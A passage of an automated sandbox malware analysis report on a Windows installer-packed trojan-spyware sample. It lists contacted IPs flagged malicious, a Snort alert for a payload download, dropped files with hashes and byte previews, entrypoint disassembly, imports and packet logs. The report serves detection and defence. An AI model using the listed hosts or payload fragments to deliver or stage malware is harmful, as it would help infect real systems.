                                                                                                                                http://tempuri.org/Entity/Id10Responseo4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/Renewo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://tempuri.org/Entity/Id8Responseo4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://support.google.com/chrome/?p=plugin_wmpo4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeyo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://support.google.com/chrome/answer/6258784o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2006/02/addressingidentityo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                                                                		high

                                                                                                                                                Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                185.112.83.8
                                                                                                                                                		unknownRussian Federation
                                                                                                                                                		50113SUPERSERVERSDATACENTERRUtrue
                                                                                                                                                194.26.229.202
                                                                                                                                                		unknownNetherlands
                                                                                                                                                		1213HEANETIEtrue

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                Analysis ID:542642
                                                                                                                                                Start date:20.12.2021
                                                                                                                                                Start time:10:58:51
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 9m 8s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:light
                                                                                                                                                Sample file name:o4XzTr73Ut.exe
                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                Number of analysed new started processes analysed:17
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@3/4@0/2
                                                                                                                                                EGA Information:Failed
                                                                                                                                                HDC Information:
                                                                                                                                                • Successful, ratio: 24.6% (good quality ratio 24.1%)
                                                                                                                                                • Quality average: 88.3%
                                                                                                                                                • Quality standard deviation: 21%
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 83%
                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI
                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                • Override analysis time to 240s for sample files taking high CPU consumption
                                                                                                                                                • Stop behavior analysis, all processes terminated
                                                                                                                                                Warnings:
                                                                                                                                                Show All
                                                                                                                                                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                • TCP Packets have been reduced to 100
                                                                                                                                                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                TimeTypeDescription
                                                                                                                                                11:02:49API Interceptor10x Sleep call for process: o4XzTr73Ut.exe modified

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                No context

                                                                                                                                                Domains

                                                                                                                                                No context

                                                                                                                                                ASN

                                                                                                                                                No context

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                No context

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\o4XzTr73Ut.exe.log
                                                                                                                                                Process:C:\Users\user\Desktop\o4XzTr73Ut.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2291
                                                                                                                                                Entropy (8bit):5.3192079301865585
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:MIHKmfHK5HKXAHKhBHKdHKB1AHKzvQTHmYHKhQnoPtHoxHImHKoLHG1qHqHAH5HX:Pqaq5qXAqLqdqUqzcGYqhQnoPtIxHbq4
                                                                                                                                                MD5:783E1AFC27D9A1FBDE01BD45717038D2
                                                                                                                                                SHA1:2D1A63904EB34F007205C76A58C51187B924BC7A
                                                                                                                                                SHA-256:1DF0D64E98D18613726435EE666629A6B010A8EBB7BE3EB90EFB114013493B15
                                                                                                                                                SHA-512:394BB2A7FCDDAC032F032C426C792A9211AF95A6012180CBE576C78FC0DDB1B876C7D28912117A26F117D95CBA2E6DB18F9E3C04DEF00421F41E0C6AD09D3485
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b
                                                                                                                                                C:\Users\user\AppData\Local\Temp\Roqueforter8.dat
                                                                                                                                                Process:C:\Users\user\Desktop\o4XzTr73Ut.exe
                                                                                                                                                File Type:DOS executable (COM)
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):47562
                                                                                                                                                Entropy (8bit):7.721891011566723
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:X8MEeT9K2b7oV3U/DTT6MviYn6PMoyqxekjpbNmUfFnm0LxfK/Zj1s8zLgwVTJN:X7N7b7oJqT6o6PMoNj9pfFNdfK/Zje8Z
                                                                                                                                                MD5:E4BF7919055573F5F2BCBD83F629E0FF
                                                                                                                                                SHA1:16DD448BDF60119973E5A1395F025240AF96CF16
                                                                                                                                                SHA-256:96B00AB5DD8E21EAD05BBF575260C7590E60B17FB2703CAFE3569C8EB2B10E2A
                                                                                                                                                SHA-512:CE14C25F7DE4A318F6CF70879327A6F093C4B1E270CDC5BA025E958C2D75CC27C1DD1740857A3EC9776B5DE2E5C768F7D2E0EB95D9F448E7C443567F53FAFD20
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: .W_.?.u.....u.....u........h.....4$..p..,$.....$.UA...$...W.,$.R..Z1..4.2..J....9.u.W.......).J2}.F..K.9.ICV5..S~t6..y.mT3.z|.'.F..2..4...E.....8f....h...?).LS..gDb....E..s...#...G....i.WT)S...m.eC.......;..Z..G.N. .n.m..E._M.t...iL[>k=!..pa.&@.&.a.....:.Q.u.eF^..#7....+...O[z.D?...0.,.j.|.Tv......E....,.9I7.F.4.-A.;.L.....7.A..#....K7.}',.p^..D..!D........J2..J.....E(J2...w.......L.J.......0....1.2.I.b..J.4.<@....1......W..$T|...|.H2.(lI...w.D.T|....z..yY.Ni.J......D....>.....9..Vi.J.!I....J.tJ2.I....J.?.....J2....1.J2...2.........tK.}A>..\<..A>.........x.n:.J......8.z...?2s.7...|/.-.03.~......%.L.$.v.".......%$..t...>.O+....>.vAN..=w.pu.0...3.0...UF.x6Q.......~.5...4.0.x.Z..U.......Dr.y.Z..9.k......J25...."..{....J.....R.......6u.....sV.b..{.r...Lg...NB.~RA~.._w.5.s.O...n..'.a...6..=9.yl8L..2.N....D5..W+dd6c.:...[.I....J..f...~!.}...".x.PT.?......e=x.9.C..../....Mj.5...........jM(......5.J25.UAL."~|......Z.?>.5....i....r.|Af.w.!:5..;..K2.I.JY.."A~.%.M.5
                                                                                                                                                C:\Users\user\AppData\Local\Temp\a.txt
                                                                                                                                                Process:C:\Users\user\Desktop\o4XzTr73Ut.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):23
                                                                                                                                                Entropy (8bit):2.2068570640942187
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:jNDBfN:jNVfN
                                                                                                                                                MD5:6C3AA179406696C66ACF8DC984ABC7DF
                                                                                                                                                SHA1:7F66AB35CA41A3449382F9DA68864D64EC182F28
                                                                                                                                                SHA-256:798DF5B3298985AE022F8C5A6714F7891EAA49B2E4B24E3A8B2329C04DD11C71
                                                                                                                                                SHA-512:7551B1FBE1CAEF52FD0AFC8601DCD0D6F013198FCC7CBF57F42EB090577B34B91E6F4ADCE1A76BC7FFD95559A3FDD529FE6DE90B8335EF8E901CBB606DDAE836
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: ghdfhjfghfgjfdghfghfgdh
                                                                                                                                                C:\Users\user\AppData\Local\Temp\nsb3A92.tmp\System.dll
                                                                                                                                                Process:C:\Users\user\Desktop\o4XzTr73Ut.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):12288
                                                                                                                                                Entropy (8bit):5.814115788739565
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                                                                                                MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                                                                                                SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                                                                                                                SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                                                                                                                SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                Entropy (8bit):7.533807802412177
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                File name:o4XzTr73Ut.exe
                                                                                                                                                File size:96864
                                                                                                                                                MD5:f65536b785611d1b549e8d866fc898ee
                                                                                                                                                SHA1:ac5d59453273ad0b026d1cd244c422cc020b94b0
                                                                                                                                                SHA256:a319ca95679f9e8a30001a66ec55403a08be8c7398916746baea02c6c6539d02
                                                                                                                                                SHA512:9b70f75e5f3345062301b12ddf8572b63adfcfeb6b40b518d53e3f639c47c2de43d7f8e84f975a08a092ef9cb7adedf4c1a1d47458e37932906e8972f67aff59
                                                                                                                                                SSDEEP:1536:4/T2X/jN2vxZz0DTHUpouMJbdxE+1KloObnlpRaH3OS3kg/S5ERghv0HUxyEMbq:4bG7N2kDTHUpouMJbdPKlJnjRaH+ckgj
                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:b2a88c96b2ca6a72

                                                                                                                                                Static PE Info

                                                                                                                                                General

                                                                                                                                                Entrypoint:0x40352d
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:true
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:4
                                                                                                                                                OS Version Minor:0
                                                                                                                                                File Version Major:4
                                                                                                                                                File Version Minor:0
                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6

                                                                                                                                                Authenticode Signature

                                                                                                                                                Signature Valid:false
                                                                                                                                                Signature Issuer:E=levetiderne@KONTRAKTTILLGS.Kyp, CN=QUINTONS, OU=combination, O=Udgangsvrdier8, L=Sley, S=CLUBBISM, C=CM
                                                                                                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                Error Number:-2146762487
                                                                                                                                                Not Before, Not After
                                                                                                                                                • 12/16/2021 10:00:21 PM 12/16/2022 10:00:21 PM
                                                                                                                                                Subject Chain
                                                                                                                                                • E=levetiderne@KONTRAKTTILLGS.Kyp, CN=QUINTONS, OU=combination, O=Udgangsvrdier8, L=Sley, S=CLUBBISM, C=CM
                                                                                                                                                Version:3
                                                                                                                                                Thumbprint MD5:2EC09EDC6480E7CDEFC44E7B6A5E4B8A
                                                                                                                                                Thumbprint SHA-1:09814829AF7074F3F52699D26B6437E17015A39A
                                                                                                                                                Thumbprint SHA-256:EB9CD30C7ADCEFF3D27D60F0782C18644451949B47FA202806C7BF240695F889
                                                                                                                                                Serial:00

                                                                                                                                                Entrypoint Preview

                                                                                                                                                Instruction
                                                                                                                                                push ebp
                                                                                                                                                mov ebp, esp
                                                                                                                                                sub esp, 000003F4h
                                                                                                                                                push ebx
                                                                                                                                                push esi
                                                                                                                                                push edi
                                                                                                                                                push 00000020h
                                                                                                                                                pop edi
                                                                                                                                                xor ebx, ebx
                                                                                                                                                push 00008001h
                                                                                                                                                mov dword ptr [ebp-14h], ebx
                                                                                                                                                mov dword ptr [ebp-04h], 0040A2E0h
                                                                                                                                                mov dword ptr [ebp-10h], ebx
                                                                                                                                                call dword ptr [004080CCh]
                                                                                                                                                mov esi, dword ptr [004080D0h]
                                                                                                                                                lea eax, dword ptr [ebp-00000140h]
                                                                                                                                                push eax
                                                                                                                                                mov dword ptr [ebp-0000012Ch], ebx
                                                                                                                                                mov dword ptr [ebp-2Ch], ebx
                                                                                                                                                mov dword ptr [ebp-28h], ebx
                                                                                                                                                mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                                                                                call esi
                                                                                                                                                test eax, eax
                                                                                                                                                jne 00007F1ED0B3128Ah
                                                                                                                                                lea eax, dword ptr [ebp-00000140h]
                                                                                                                                                mov dword ptr [ebp-00000140h], 00000114h
                                                                                                                                                push eax
                                                                                                                                                call esi
                                                                                                                                                mov ax, word ptr [ebp-0000012Ch]
                                                                                                                                                mov ecx, dword ptr [ebp-00000112h]
                                                                                                                                                sub ax, 00000053h
                                                                                                                                                add ecx, FFFFFFD0h
                                                                                                                                                neg ax
                                                                                                                                                sbb eax, eax
                                                                                                                                                mov byte ptr [ebp-26h], 00000004h
                                                                                                                                                not eax
                                                                                                                                                and eax, ecx
                                                                                                                                                mov word ptr [ebp-2Ch], ax
                                                                                                                                                cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                                                                                jnc 00007F1ED0B3125Ah
                                                                                                                                                and word ptr [ebp-00000132h], 0000h
                                                                                                                                                mov eax, dword ptr [ebp-00000134h]
                                                                                                                                                movzx ecx, byte ptr [ebp-00000138h]
                                                                                                                                                mov dword ptr [00434FB8h], eax
                                                                                                                                                xor eax, eax
                                                                                                                                                mov ah, byte ptr [ebp-0000013Ch]
                                                                                                                                                movzx eax, ax
                                                                                                                                                or eax, ecx
                                                                                                                                                xor ecx, ecx
                                                                                                                                                mov ch, byte ptr [ebp-2Ch]
                                                                                                                                                movzx ecx, cx
                                                                                                                                                shl eax, 10h
                                                                                                                                                or eax, ecx

                                                                                                                                                Rich Headers

                                                                                                                                                Programming Language:
                                                                                                                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                Data Directories

                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x4c0000xe48.rsrc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x165f80x1468.data
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                Sections

                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                .text0x10000x68970x6a00False0.666126179245data6.45839821493IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                .rdata0x80000x14a60x1600False0.439275568182data5.02410928126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                .data0xa0000x2b0180x600False0.521484375data4.15458210409IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                .ndata0x360000x160000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                .rsrc0x4c0000xe480x1000False0.38916015625data4.02680822028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                Resources

                                                                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                                                                RT_ICON0x4c2080x2e8dataEnglishUnited States
                                                                                                                                                RT_DIALOG0x4c4f00x100dataEnglishUnited States
                                                                                                                                                RT_DIALOG0x4c5f00x11cdataEnglishUnited States
                                                                                                                                                RT_DIALOG0x4c7100xc4dataEnglishUnited States
                                                                                                                                                RT_DIALOG0x4c7d80x60dataEnglishUnited States
                                                                                                                                                RT_GROUP_ICON0x4c8380x14dataEnglishUnited States
                                                                                                                                                RT_VERSION0x4c8500x2b4dataEnglishUnited States
                                                                                                                                                RT_MANIFEST0x4cb080x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                                                Imports

                                                                                                                                                DLLImport
                                                                                                                                                ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                                                                                                SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                                                                                                ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                                                                                                COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                                                                                USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                                                                                                GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                                                                                KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                                                                                                                Version Infos

                                                                                                                                                DescriptionData
                                                                                                                                                LegalCopyrightAsilum
                                                                                                                                                FileVersion1.2.3
                                                                                                                                                CompanyNameAsilum company
                                                                                                                                                LegalTrademarksAsilum is a trademark of Asilum company
                                                                                                                                                CommentsAsilum
                                                                                                                                                ProductNameAsilum Application
                                                                                                                                                FileDescriptionAsilum Application
                                                                                                                                                Translation0x0409 0x04b0

                                                                                                                                                Possible Origin

                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                EnglishUnited States

                                                                                                                                                Network Behavior

                                                                                                                                                Snort IDS Alerts

                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                12/20/21-11:02:26.621888TCP2018752ET TROJAN Generic .bin download from Dotted Quad4980680192.168.2.4185.112.83.8

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Dec 20, 2021 11:02:26.564793110 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.621174097 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.621313095 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.621887922 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.676671028 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.676723957 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.676759958 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.676791906 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.676825047 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.676888943 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.676933050 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.676951885 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.676990986 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.677010059 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.677056074 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.677061081 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.677113056 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.677117109 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.677162886 CET4980680192.168.2.4185.112.83.8
                                                                                                                                                Dec 20, 2021 11:02:26.677170992 CET8049806185.112.83.8192.168.2.4
                                                                                                                                                Dec 20, 2021 11:02:26.677216053 CET4980680192.168.2.4185.112.83.8
